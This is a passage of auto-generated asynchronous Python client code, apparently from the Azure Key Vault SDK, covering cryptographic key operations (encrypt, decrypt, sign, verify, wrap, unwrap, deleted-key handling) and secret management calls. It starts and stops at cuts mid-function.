api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.encrypt.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
encrypt.metadata = {'url': '/keys/{key-name}/{key-version}/encrypt'} # type: ignore
async def decrypt(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Decrypts a single block of encrypted data.
The DECRYPT operation decrypts a well-formed block of ciphertext using the target encryption
key and specified algorithm. This operation is the reverse of the ENCRYPT operation; only a
single block of data may be decrypted, the size of this block is dependent on the target key
and the algorithm to be used. The DECRYPT operation applies to asymmetric and symmetric keys
stored in Azure Key Vault since it uses the private portion of the key. This operation requires
the keys/decrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the decryption operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.decrypt.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
decrypt.metadata = {'url': '/keys/{key-name}/{key-version}/decrypt'} # type: ignore
async def sign(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeySignParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Creates a signature from a digest using the specified key.
The SIGN operation is applicable to asymmetric and symmetric keys stored in Azure Key Vault
since this operation uses the private portion of the key. This operation requires the keys/sign
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the signing operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeySignParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.sign.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeySignParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
sign.metadata = {'url': '/keys/{key-name}/{key-version}/sign'} # type: ignore
async def verify(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyVerifyParameters",
**kwargs: Any
) -> "_models.KeyVerifyResult":
"""Verifies a signature using a specified key.
The VERIFY operation is applicable to symmetric keys stored in Azure Key Vault. VERIFY is not
strictly necessary for asymmetric keys stored in Azure Key Vault since signature verification
can be performed using the public portion of the key but this operation is supported as a
convenience for callers that only have a key-reference and not the public portion of the key.
This operation requires the keys/verify permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for verify operations.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyVerifyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyVerifyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyVerifyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyVerifyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.verify.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyVerifyParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyVerifyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
verify.metadata = {'url': '/keys/{key-name}/{key-version}/verify'} # type: ignore
async def wrap_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Wraps a symmetric key using a specified key.
The WRAP operation supports encryption of a symmetric key using a key encryption key that has
previously been stored in an Azure Key Vault. The WRAP operation is only strictly necessary for
symmetric keys stored in Azure Key Vault since protection with an asymmetric key can be
performed using the public portion of the key. This operation is supported for asymmetric keys
as a convenience for callers that have a key-reference but do not have access to the public key
material. This operation requires the keys/wrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for wrap operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.wrap_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
wrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/wrapkey'} # type: ignore
async def unwrap_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Unwraps a symmetric key using the specified key that was initially used for wrapping that key.
The UNWRAP operation supports decryption of a symmetric key using the target key encryption
key. This operation is the reverse of the WRAP operation. The UNWRAP operation applies to
asymmetric and symmetric keys stored in Azure Key Vault since it uses the private portion of
the key. This operation requires the keys/unwrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the key operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.unwrap_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
unwrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/unwrapkey'} # type: ignore
def get_deleted_keys(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.DeletedKeyListResult"]:
"""Lists the deleted keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a deleted key. This operation includes deletion-specific information. The Get
Deleted Keys operation is applicable for vaults enabled for soft-delete. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedKeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.DeletedKeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_deleted_keys.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DeletedKeyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_deleted_keys.metadata = {'url': '/deletedkeys'} # type: ignore
async def get_deleted_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.DeletedKeyBundle":
"""Gets the public part of a deleted key.
The Get Deleted Key operation is applicable for soft-delete enabled vaults. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_deleted_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
async def purge_deleted_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> None:
"""Permanently deletes the specified key.
The Purge Deleted Key operation is applicable for soft-delete enabled vaults. While the
operation can be invoked on any vault, it will return an error if invoked on a non soft-delete
enabled vault. This operation requires the keys/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.purge_deleted_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
async def recover_deleted_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.KeyBundle":
"""Recovers the deleted key to its latest version.
The Recover Deleted Key operation is applicable for deleted keys in soft-delete enabled vaults.
It recovers the deleted key back to its latest version under /keys. An attempt to recover an
non-deleted key will return an error. Consider this the inverse of the delete operation on
soft-delete enabled vaults. This operation requires the keys/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the deleted key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.recover_deleted_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_key.metadata = {'url': '/deletedkeys/{key-name}/recover'} # type: ignore
async def set_secret(
self,
vault_base_url: str,
secret_name: str,
parameters: "_models.SecretSetParameters",
**kwargs: Any
) -> "_models.SecretBundle":
"""Sets a secret in a specified key vault.
The SET operation adds a secret to the Azure Key Vault. If the named secret already exists,
Azure Key Vault creates a new version of that secret. This operation requires the secrets/set
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param parameters: The parameters for setting the secret.
:type parameters: ~azure.keyvault.v2016_10_01.models.SecretSetParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SecretSetParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_secret.metadata = {'url': '/secrets/{secret-name}'} # type: ignore
async def delete_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.DeletedSecretBundle":
"""Deletes a secret from a specified key vault.
The DELETE operation applies to any secret stored in Azure Key Vault. DELETE cannot be applied
to an individual version of a secret. This operation requires the secrets/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedSecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedSecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedSecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedSecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_secret.metadata = {'url': '/secrets/{secret-name}'} # type: ignore
async def update_secret(
self,
vault_base_url: str,
secret_name: str,
secret_version: str,
parameters: "_models.SecretUpdateParameters",
**kwargs: Any
) -> "_models.SecretBundle":
"""Updates the attributes associated with a specified secret in a given key vault.
The UPDATE operation changes specified attributes of an existing stored secret. Attributes that
are not specified in the request are left unchanged. The value of a secret itself cannot be
changed. This operation requires the secrets/set permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param secret_version: The version of the secret.
:type secret_version: str
:param parameters: The parameters for update secret operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.SecretUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
'secret-version': self._serialize.url("secret_version", secret_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SecretUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_secret.metadata = {'url': '/secrets/{secret-name}/{secret-version}'} # type: ignore
async def get_secret(
self,
vault_base_url: str,
secret_name: str,
secret_version: str,
**kwargs: Any
) -> "_models.SecretBundle":
"""Get a specified secret from a given key vault.
The GET operation is applicable to any secret stored in Azure Key Vault. This operation
requires the secrets/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
